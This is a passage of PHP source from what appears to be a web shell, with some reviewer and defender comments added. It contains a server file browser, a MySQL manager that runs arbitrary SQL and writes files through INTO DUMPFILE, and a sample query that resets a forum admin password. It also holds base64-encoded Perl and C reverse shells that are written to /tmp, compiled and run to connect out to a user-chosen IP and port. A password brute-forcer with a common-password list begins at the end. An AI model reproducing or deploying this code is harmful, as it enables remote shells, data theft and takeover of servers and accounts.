639 @sort($dirdata);
640 @sort($filedata);
641 $dir_i = '0';
642 foreach($dirdata as $key => $dirdb){
643 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
644 $thisbg = bg();
645 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
646 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
647 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
648 p('<td nowrap>'.$dirdb['mtime'].'</td>');
649 p('<td nowrap>--</td>');
650 p('<td nowrap>');
651 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
652 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
653 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
654 p('</tr>');
655 $dir_i++;
656 } else {
657 if($dirdb['filename']=='..') {
658 p('<tr class=fout>');
659 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
660 p('</tr>');
661 }
662 }
663 }
664
665 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
666 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
667 makehide('action','file');
668 makehide('thefile');
669 makehide('doing');
670 makehide('dir',$nowpath);
671 $file_i = '0';
672 foreach($filedata as $key => $filedb){
673 if($filedb['filename']!='..' && $filedb['filename']!='.') {
674 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
675 $thisbg = bg();
676 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
677 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
678 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
679 p('<td nowrap>'.$filedb['mtime'].'</td>');
680 p('<td nowrap>'.$filedb['size'].'</td>');
681 p('<td nowrap>');
682 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
683 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
684 p('<td nowrap>');
685 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
686 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
687 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
688 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
689 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
690 p('</td></tr>');
691 $file_i++;
692 }
693 }
694 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
695 p('</form></table>');
696}// end dir
697
698elseif ($action == 'sqlfile') {
699 if($doing=="mysqlupload"){
700 $file = $_FILES['uploadfile'];
701 $filename = $file['tmp_name'];
702 if (file_exists($savepath)) {
703 m('The goal file has already existed');
704 } else {
705 if(!$filename) {
706 m('Please choose a file');
707 } else {
708 $fp=@fopen($filename,'r');
709 $contents=@fread($fp, filesize($filename));
710 @fclose($fp);
711 $contents = bin2hex($contents);
712 if(!$upname) $upname = $file['name'];
713 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
714 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
715 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
716 }
717 }
718 }
719?>
720<script type="text/javascript">
// Copies the database connection fields (host, port, user, password, database, charset) from the
// "dbinfo" form into the multipart "mysqlfile" form, sets the requested operation in "doing", and submits.
// The database password is therefore sent in the body of each upload/download request.
// NOTE(review): $('doing') looks the field up by id; this relies on makehide() emitting an id attribute — confirm.
721function mysqlfile(doing){
722 if(!doing) return;
723 $('doing').value=doing;
724 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
725 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
726 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
727 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
728 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
729 $('mysqlfile').charset.value=$('dbinfo').charset.value;
730 $('mysqlfile').submit();
731}
732</script>
733<?php
734 !$dbhost && $dbhost = 'localhost';
735 !$dbuser && $dbuser = 'root';
736 !$dbport && $dbport = '3306';
737 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
738 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
739 makehide('action','sqlfile');
740 p('<p>');
741 p('DBHost:');
742 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
743 p(':');
744 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
745 p('DBUser:');
746 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
747 p('DBPass:');
748 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
749 p('DBName:');
750 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
751 p('DBCharset:');
752 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
753 p('</p>');
754 formfoot();
755 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
756 p('<h2>Upload file</h2>');
757 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
758 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
759 p('<h2>Download file</h2>');
760 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
761 makehide('dbhost');
762 makehide('dbport');
763 makehide('dbuser');
764 makehide('dbpass');
765 makehide('dbname');
766 makehide('charset');
767 makehide('doing');
768 makehide('action','sqlfile');
769 p('</form>');
770}
771
772elseif ($action == 'sqladmin') {
773 !$dbhost && $dbhost = 'localhost';
774 !$dbuser && $dbuser = 'root';
775 !$dbport && $dbport = '3306';
776 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
777 if(isset($dbhost)){
778 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
779 }
780 if(isset($dbuser)) {
781 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
782 }
783 if(isset($dbpass)) {
784 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
785 }
786 if(isset($dbport)) {
787 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
788 }
789 if(isset($dbname)) {
790 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
791 }
792 if(isset($charset)) {
793 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
794 }
795
796 if ($doing == 'backupmysql' && $saveasfile) {
797 if (!$table) {
798 m('Please choose the table');
799 } else {
800 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
801 $table = array_flip($table);
802 $fp = @fopen($path,'w');
803 if ($fp) {
804 $result = q('SHOW tables');
805 if (!$result) p('<h2>'.mysql_error().'</h2>');
806 $mysqldata = '';
807 while ($currow = mysql_fetch_array($result)) {
808 if (isset($table[$currow[0]])) {
809 sqldumptable($currow[0], $fp);
810 }
811 }
812 fclose($fp);
813 $fileurl = str_replace(SA_ROOT,'',$path);
814 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
815 mysql_close();
816 } else {
817 m('Backup failed');
818 }
819 }
820 }
// Row-level write operations of the SQL manager (insert, update, delete, drop).
// $insert, $update, $insertsql, $tablename, $base64 and $doing are request
// parameters: the loop at the top of the file copies every GET/POST key that does
// not start with "_" into a variable of the same name.
// Only column values pass through addslashes(); the table name, the column names
// ($key) and the WHERE clause are concatenated into each statement unchanged.
// Defender note: every statement runs with the privileges of the database account
// whose credentials were typed into the form, so an application account without
// DROP/DELETE rights limits what this branch can do, and the MySQL general or
// binary log records the statements it issues.
// NOTE(review): dbconn() and q() are defined outside this excerpt; q() presumably
// sends the statement over the connection opened by dbconn().
821 if ($insert && $insertsql) {
822 $keystr = $valstr = $tmp = '';
// Build "col1,col2" and "'v1','v2'" lists from the non-empty submitted fields.
823 foreach($insertsql as $key => $val) {
824 if ($val) {
825 $keystr .= $tmp.$key;
826 $valstr .= $tmp."'".addslashes($val)."'";
827 $tmp = ',';
828 }
829 }
830 if ($keystr && $valstr) {
831 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
832 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
833 }
834 }
// UPDATE: unlike the insert path, empty values are included in the SET list.
835 if ($update && $insertsql && $base64) {
836 $valstr = $tmp = '';
837 foreach($insertsql as $key => $val) {
838 $valstr .= $tmp.$key."='".addslashes($val)."'";
839 $tmp = ',';
840 }
841 if ($valstr) {
// The WHERE clause is whatever the base64 request field decodes to; the record
// listing later in this branch generates it from a row's column values.
842 $where = base64_decode($base64);
843 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
844 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
845 }
846 }
// DELETE: same decoded WHERE clause, but without the LIMIT 1 used by the update.
847 if ($doing == 'del' && $base64) {
848 $where = base64_decode($base64);
// $delete_sql is assigned but never used; the statement is rebuilt in the q() call.
849 $delete_sql = "DELETE FROM $tablename WHERE $where";
850 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
851 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
852 }
853
// DROP TABLE on the request-supplied table name; the name is cleared on success so
// the rest of the page no longer refers to the dropped table.
854 if ($tablename && $doing == 'drop') {
855 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
856 if (q("DROP TABLE $tablename")) {
857 m('Drop table of success');
858 $tablename = '';
859 } else {
860 m(mysql_error());
861 }
862 }
863
864 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
865
866 formhead(array('title'=>'MYSQL Manager'));
867 makehide('action','sqladmin');
868 p('<p>');
869 p('DBHost:');
870 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
871 p(':');
872 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
873 p('DBUser:');
874 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
875 p('DBPass:');
876 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
877 p('DBCharset:');
878 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
879 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
880 p('</p>');
881 formfoot();
882?>
883<script type="text/javascript">
884function editrecord(action, base64, tablename){
885 if (action == 'del') {
886 if (!confirm('Is or isn\'t deletion record?')) return;
887 }
888 $('recordlist').doing.value=action;
889 $('recordlist').base64.value=base64;
890 $('recordlist').tablename.value=tablename;
891 $('recordlist').submit();
892}
893function moddbname(dbname) {
894 if(!dbname) return;
895 $('setdbname').dbname.value=dbname;
896 $('setdbname').submit();
897}
898function settable(tablename,doing,page) {
899 if(!tablename) return;
900 if (doing) {
901 $('settable').doing.value=doing;
902 }
903 if (page) {
904 $('settable').page.value=page;
905 }
906 $('settable').tablename.value=tablename;
907 $('settable').submit();
908}
909</script>
910<?php
911 // SQL
912 formhead(array('name'=>'recordlist'));
913 makehide('doing');
914 makehide('action','sqladmin');
915 makehide('base64');
916 makehide('tablename');
917 p($dbform);
918 formfoot();
919
920 // Data
921 formhead(array('name'=>'setdbname'));
922 makehide('action','sqladmin');
923 p($dbform);
924 if (!$dbname) {
925 makehide('dbname');
926 }
927 formfoot();
928
929
930 formhead(array('name'=>'settable'));
931 makehide('action','sqladmin');
932 p($dbform);
933 makehide('tablename');
934 makehide('page',$page);
935 makehide('doing');
936 formfoot();
937
938 $cachetables = array();
939 $pagenum = 30;
940 $page = intval($page);
941 if($page) {
942 $start_limit = ($page - 1) * $pagenum;
943 } else {
944 $start_limit = 0;
945 $page = 1;
946 }
947 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
948 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
949 // get mysql server
950 $mysqlver = mysql_get_server_info();
951 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
952 $highver = $mysqlver > '4.1' ? 1 : 0;
953
954 // Show database
955 $query = q("SHOW DATABASES");
956 $dbs = array();
957 $dbs[] = '-- Select a database --';
958 while($db = mysql_fetch_array($query)) {
959 $dbs[$db['Database']] = $db['Database'];
960 }
961 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
962 $tabledb = array();
963 if ($dbname) {
964 p('<p>');
965 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
966 if ($tablename) {
967 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
968 }
969 p('</p>');
970 mysql_select_db($dbname);
971
972 $getnumsql = '';
973 $runquery = 0;
974 if ($sql_query) {
975 $runquery = 1;
976 }
977 $allowedit = 0;
978 if ($tablename && !$sql_query) {
979 $sql_query = "SELECT * FROM $tablename";
980 $getnumsql = $sql_query;
981 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
982 $allowedit = 1;
983 }
984 p('<form action="'.$self.'" method="POST">');
985 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>tmt</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
986 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
987 makehide('tablename', $tablename);
988 makehide('action','sqladmin');
989 p($dbform);
990 p('</form>');
991 if ($tablename || ($runquery && $sql_query)) {
992 if ($doing == 'structure') {
993 $result = q("SHOW COLUMNS FROM $tablename");
994 $rowdb = array();
995 while($row = mysql_fetch_array($result)) {
996 $rowdb[] = $row;
997 }
998 p('<table border="0" cellpadding="3" cellspacing="0">');
999 p('<tr class="head">');
1000 p('<td>Field</td>');
1001 p('<td>Type</td>');
1002 p('<td>Null</td>');
1003 p('<td>Key</td>');
1004 p('<td>Default</td>');
1005 p('<td>Extra</td>');
1006 p('</tr>');
1007 foreach ($rowdb as $row) {
1008 $thisbg = bg();
1009 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1010 p('<td>'.$row['Field'].'</td>');
1011 p('<td>'.$row['Type'].'</td>');
1012 p('<td>'.$row['Null'].' </td>');
1013 p('<td>'.$row['Key'].' </td>');
1014 p('<td>'.$row['Default'].' </td>');
1015 p('<td>'.$row['Extra'].' </td>');
1016 p('</tr>');
1017 }
1018 tbfoot();
1019 } elseif ($doing == 'insert' || $doing == 'edit') {
1020 $result = q('SHOW COLUMNS FROM '.$tablename);
1021 while ($row = mysql_fetch_array($result)) {
1022 $rowdb[] = $row;
1023 }
1024 $rs = array();
1025 if ($doing == 'insert') {
1026 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1027 } else {
1028 p('<h2>Update record in '.$tablename.' table »</h2>');
1029 $where = base64_decode($base64);
1030 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1031 $rs = mysql_fetch_array($result);
1032 }
1033 p('<form method="post" action="'.$self.'">');
1034 p($dbform);
1035 makehide('action','sqladmin');
1036 makehide('tablename',$tablename);
1037 p('<table border="0" cellpadding="3" cellspacing="0">');
1038 foreach ($rowdb as $row) {
1039 if ($rs[$row['Field']]) {
1040 $value = htmlspecialchars($rs[$row['Field']]);
1041 } else {
1042 $value = '';
1043 }
1044 $thisbg = bg();
1045 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1046 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1047 }
1048 if ($doing == 'insert') {
1049 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1050 } else {
1051 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1052 makehide('base64', $base64);
1053 }
1054 p('</table></form>');
1055 } else {
1056 $querys = @explode(';',$sql_query);
1057 foreach($querys as $num=>$query) {
1058 if ($query) {
1059 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1060 switch(qy($query))
1061 {
1062 case 0:
1063 p('<h2>Error : '.mysql_error().'</h2>');
1064 break;
1065 case 1:
1066 if (strtolower(substr($query,0,13)) == 'select * from') {
1067 $allowedit = 1;
1068 }
1069 if ($getnumsql) {
1070 $tatol = mysql_num_rows(q($getnumsql));
1071 $multipage = multi($tatol, $pagenum, $page, $tablename);
1072 }
1073 if (!$tablename) {
1074 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1075 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1076 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1077 $tablename = $matches[1][0];
1078 }
1079 $result = q($query);
1080 p($multipage);
1081 p('<table border="0" cellpadding="3" cellspacing="0">');
1082 p('<tr class="head">');
1083 if ($allowedit) p('<td>Action</td>');
1084 $fieldnum = @mysql_num_fields($result);
1085 for($i=0;$i<$fieldnum;$i++){
1086 $name = @mysql_field_name($result, $i);
1087 $type = @mysql_field_type($result, $i);
1088 $len = @mysql_field_len($result, $i);
1089 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1090 }
1091 p('</tr>');
1092 while($mn = @mysql_fetch_assoc($result)){
1093 $thisbg = bg();
1094 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1095 $where = $tmp = $b1 = '';
1096 foreach($mn as $key=>$inside){
1097 if ($inside) {
1098 $where .= $tmp.$key."='".addslashes($inside)."'";
1099 $tmp = ' AND ';
1100 }
1101 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
1102 }
1103 $where = base64_encode($where);
1104 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1105 p($b1);
1106 p('</tr>');
1107 unset($b1);
1108 }
1109 tbfoot();
1110 p($multipage);
1111 break;
1112 case 2:
1113 $ar = mysql_affected_rows();
1114 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1115 break;
1116 }
1117 }
1118 }
1119 }
1120 } else {
1121 $query = q("SHOW TABLE STATUS");
1122 $table_num = $table_rows = $data_size = 0;
1123 $tabledb = array();
1124 while($table = mysql_fetch_array($query)) {
1125 $data_size = $data_size + $table['Data_length'];
1126 $table_rows = $table_rows + $table['Rows'];
1127 $table['Data_length'] = sizecount($table['Data_length']);
1128 $table_num++;
1129 $tabledb[] = $table;
1130 }
1131 $data_size = sizecount($data_size);
1132 unset($table);
1133 p('<table border="0" cellpadding="0" cellspacing="0">');
1134 p('<form action="'.$self.'" method="POST">');
1135 makehide('action','sqladmin');
1136 p($dbform);
1137 p('<tr class="head">');
1138 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1139 p('<td>Name</td>');
1140 p('<td>Rows</td>');
1141 p('<td>Data_length</td>');
1142 p('<td>Create_time</td>');
1143 p('<td>Update_time</td>');
1144 if ($highver) {
1145 p('<td>Engine</td>');
1146 p('<td>Collation</td>');
1147 }
1148 p('</tr>');
1149 foreach ($tabledb as $key => $table) {
1150 $thisbg = bg();
1151 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1152 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1153 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1154 p('<td>'.$table['Rows'].'</td>');
1155 p('<td>'.$table['Data_length'].'</td>');
1156 p('<td>'.$table['Create_time'].'</td>');
1157 p('<td>'.$table['Update_time'].'</td>');
1158 if ($highver) {
1159 p('<td>'.$table['Engine'].'</td>');
1160 p('<td>'.$table['Collation'].'</td>');
1161 }
1162 p('</tr>');
1163 }
1164 p('<tr class=fout>');
1165 p('<td> </td>');
1166 p('<td>Total tables: '.$table_num.'</td>');
1167 p('<td>'.$table_rows.'</td>');
1168 p('<td>'.$data_size.'</td>');
1169 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
1170 p('</tr>');
1171
1172 p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1173 makehide('doing','backupmysql');
1174 formfoot();
1175 p("</table>");
1176 fr($query);
1177 }
1178 }
1179 }
1180 tbfoot();
1181 @mysql_close();
1182}//end sql backup
1183
1184
1185elseif ($action == 'backconnect') {
1186 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1187 !$yourport && $yourport = '12345';
1188 $usedb = array('perl'=>'perl','c'=>'c');
1189
1190 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1191 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1192 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1193 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1194 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1195 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1196 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1197 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1198 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1199 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1200 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1201 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1202 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1203 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1204 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1205
// Launch step of the "Back Connect" feature. $start, $use, $yourip and $yourport are
// request parameters; earlier in this branch $yourip falls back to the client address
// (REMOTE_ADDR) and $yourport to '12345'. Both values are placed on the command line
// without quoting.
// Defender note: the observable artifacts are the files /tmp/angel_bc and
// /tmp/angel_bc.c, perl or gcc being started by the web server account, and an
// outbound TCP connection from that account to the address and port in the request.
// Process-creation auditing and egress filtering for the web server user cover all
// three.
// NOTE(review): cf(), which() and execute() are defined outside this excerpt; cf()
// presumably writes the payload held in $back_connect / $back_connect_c to the given
// path, and execute() presumably runs a shell command and returns its output.
1206 if ($start && $yourip && $yourport && $use){
1207 if ($use == 'perl') {
1208 cf('/tmp/angel_bc',$back_connect);
// Trailing "&" puts the script in the background so the HTTP request can finish.
1209 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1210 } else {
// C variant: write the source, compile it on the host, delete the source, run it.
1211 cf('/tmp/angel_bc.c',$back_connect_c);
1212 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1213 @unlink('/tmp/angel_bc.c');
1214 $res = execute("/tmp/angel_bc $yourip $yourport &");
1215 }
// $res is not displayed; the message below is printed whether or not the launch worked.
1216 m("Now script try connect to $yourip port $yourport ...");
1217 }
1218
1219 formhead(array('title'=>'Back Connect'));
1220 makehide('action','backconnect');
1221 p('<p>');
1222 p('Your IP:');
1223 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1224 p('Your Port:');
1225 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1226 p('Use:');
1227 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1228 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1229 p('</p>');
1230 formfoot();
1231}//end backconnect window via NC
1232
1233// Brute
1234elseif ($action == 'brute') {
1235formhead(array('title'=>'Brute Forcer'));
1236 makehide('action','brute');
1237 makehide('dir',$brute);
1238@ini_set('memory_limit', 1000000000000);
1239$connect_timeout=5;
1240@set_time_limit(0);
1241$submit = $_REQUEST['submit'];
1242$users = $_REQUEST['users'];
1243$pass = $_REQUEST['passwords'];
1244$target = $_REQUEST['target'];
1245$option = $_REQUEST['option'];
1246
1247
1248$passlist = "0123456
124901234567
1250012345678
12510123456789
125201234567890
1253123456
12541234567
125512345678
1256123456789
12571234567890
1258111111
1259000000
1260222222
1261333333
1262444444
1263555555
1264666666
1265777777
1266888888
1267999999
1268123123
1269456456
1270789789
1271123321
1272456654
1273654321
12747654321
127587654321
1276987654321
12770987654321
1278admin
1279administrator
1280admincp
1281cpanel
1282adminx
1283admins
1284password
1285passwords
1286passw0rd
1287p@ssw0rd
1288p@ssword
1289khongco
129025251325
1291passw0rds";
1292if($target == ''){
1293$target = 'localhost';
